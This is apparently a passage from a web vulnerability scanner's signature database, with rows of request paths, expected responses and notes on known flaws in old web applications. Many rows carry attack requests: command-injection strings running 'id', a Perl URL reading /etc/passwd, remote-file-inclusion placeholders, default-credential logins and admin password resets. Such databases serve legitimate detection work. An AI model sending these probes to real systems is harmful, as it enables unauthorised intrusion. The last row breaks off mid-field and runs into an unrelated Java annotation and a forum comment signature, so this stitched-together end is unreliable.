| "001143","2809","3","/php-coolfile/action.php?action=edit&file=config.php","GET","pass_1","","","","","PHP-Coolfile 1.4 may allow any user to read the config.php file.","","" |
| "001144","3233","3","/phpBB/phpinfo.php","GET","PHP Version","","","","","phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information.","","" |
| "001145","3233","3","/phpinfo.php","GET","PHP Version","","","","","Contains PHP configuration information","","" |
| "001146","3233","3","/phpinfo.php3","GET","PHP Version","","","","","Contains PHP configuration information","","" |
| "001147","0","3","/pmlite.php","GET","200","","","","","A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details."," ","" |
| "001148","0","3","/session/admnlogin","GET","200","Error Occurred","","","","SessionServlet Output, has session cookie info.","","" |
| "001149","6560","3","/settings/site.ini","GET","DatabaseSettings","","","","","eZ publish v3 and prior allow site setup code to be viewed remotely.","","" |
| "001150","613","3","/SiteScope/htdocs/SiteScope.html","GET","200","","","","","The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.","","" |
| "001151","0","3","/soapdocs/ReleaseNotes.html","GET","Oracle SOAP","","","","","Default Oracle SOAP documentation found.","","" |
| "001152","0","3","/ssdefs/siteseed.dtd","GET","imagesDir=\"","","","","","Siteseed pre 1.4.2 has 'major' security problems, and this dtd file reveals the web root.","","" |
| "001153","0","35","/servlet/allaire.jrun.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.","","" |
| "001154","2881","3a","/pp.php?action=login","GET","200","","","","","Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.","","" |
| "001155","0","6","/isapi/count.pl?","GET","200","","","","","AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.","","" |
| "001156","0","7","/krysalis/","GET","200","","","","","Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot","","" |
| "001157","0","8","/logjam/showhits.php","GET","200","","","","","Logjam may possibly allow remote command execution via showhits.php page.","","" |
| "001158","0","8","/manual.php","GET","200","","","","","Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.","","" |
| "001159","16748","8","/mods/apage/apage.cgi?f=file.htm.|id|","GET","uid=0","","","","","WebAPP Apage.CGI remote command execution. BID-13637","","" |
| "001160","0","8","/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" |
| "001161","0","8","/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" |
| "001162","0","8","/perl/-e%20%22system('cat%20/etc/passwd');\%22","GET","root:","","","","","The installed Perl interpreter allows any command to be executed remotely.","","" |
| "001163","0","8","/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" |
| "001164","0","8","/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","","" |
| "001165","0","8","/Program%20Files/","GET","WindowsUpdate","","","","","This check (B) uses the blue test (A) for possible exploit. see http://www.badblue.com/down.htm.","","" |
| "001166","14329","8","/smssend.php","GET","200","","","","","PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php","","" |
| "001167","0","8a","/pls/simpledad/admin_/dadentries.htm","GET","Add Database Access","","","","","Oracle admin script allows modification of database information.","","" |
| "001168","0","a","/Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000","POST","Login as Admin successful","","","","","Meridian Integrated Recorded Announcer default account admin/admin000 enabled","","" |
| "001169","113","a","/ncl_items.html","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","","" |
| "001170","551","a","/ncl_items.shtml?SUBJECT=1","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","","" |
| "001171","0","a","/photo/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","","" |
| "001172","0","a","/photodata/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","","" |
| "001174","5374","a","/pub/english.cgi?op=rmail","GET","200","","","","","BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.","","" |
| "001175","0","a","/pvote/ch_info.php?newpass=password&confirm=password%20","GET","200","","","","","PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.","","" |
| "001176","240","a","/scripts/wsisa.dll/WService=anything?WSMadmin","GET","200","","","","","Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.","","" |
| "001177","3092","a","/SetSecurity.shm","GET","200","","","","","Cisco System's My Access for Wireless. This resource should be password protected.","","" |
| "001178","3126","a","/submit?setoption=q&option=allowed_ips&value=255.255.255.255","GET","200","","","","","MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.","","" |
| "001179","2225","a","/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin","GET","200","","","","","paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.","","" |
| "001180","817","ab","/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&","GET","server\.javawebserver\.serviceAdmin","","","","","The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.","","" |
| "001181","3092","b","/shopadmin.asp","GET","200","","","","","VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.","","" |
| "001182","3848","c","/modsecurity.php?inc_prefix=@RFIURL","GET","PHP Version","","","","","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/","","" |
| "001183","4268","c","/phpBB2/includes/db.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running.","","" |
| "001184","6662","4","/","GET"," |
@Value("${local.server.port}")
– azizunsal Jul 23 '15 at 12:46